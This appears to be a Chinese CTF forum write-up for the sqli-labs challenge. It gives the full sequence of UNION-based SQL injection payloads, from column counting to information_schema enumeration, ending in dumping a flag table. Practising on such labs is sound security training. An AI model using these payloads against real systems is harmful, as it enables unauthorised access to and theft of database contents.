设为首页
收藏本站
只需一步,快速开始
首页
Portal
论坛
BBS
问答
CTF社群
Group
CTF平台
每日签到
青少年CTF论坛
»
论坛
›
CTF
›
Web
›
查看内容
0 评论
0 收藏
分享
青少年CTF平台---sqli-labs
鲤鱼
发布于 2023-3-8 23:02:14
阅读 1627
查看全部
来自
江苏
 ##题目:sqli-labs #考点sql注入 打开题目 先查找字段数(id=1' order by 3 --+) 到4的时候会返回错误信息  发现有3个字段 判断回显点(?id=-1' union select 1,2,3 --+   然后看数据库的名字(id=-1' union select 1,database(),3 --+)  发现数据库是(security) 查找数据库的表名(id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=  看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)  查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)  得到flag
回复
举报
使用道具
分享
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
上一篇:
Web-Easy flag在哪里?(题目解析)
下一篇:
Checkme1-8 WP
全部回复
暂无回帖,快来参与回复吧
返回列表
发新帖
本版积分规则
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
鲤鱼
超级版主
主题
1
回复
6
粉丝
0
加好友
发私信
热点排行
1
题目:再签到一次
2
【新平台】回复换FLAG啦!
3
【活动】你知道小光的答案吗?
4
【活动】小光的答案之书
5
LiHua's checkme WP
6
入门需要怎么做?
7
取证-SSH-04
8
misc中怎么分辨各工具加密后的数据
9
sqlmap连接不到目标RUL
10
因为是一个小白,有一道题不会 请各位大佬 出手帮一下 misc的
快速回复
返回顶部
返回列表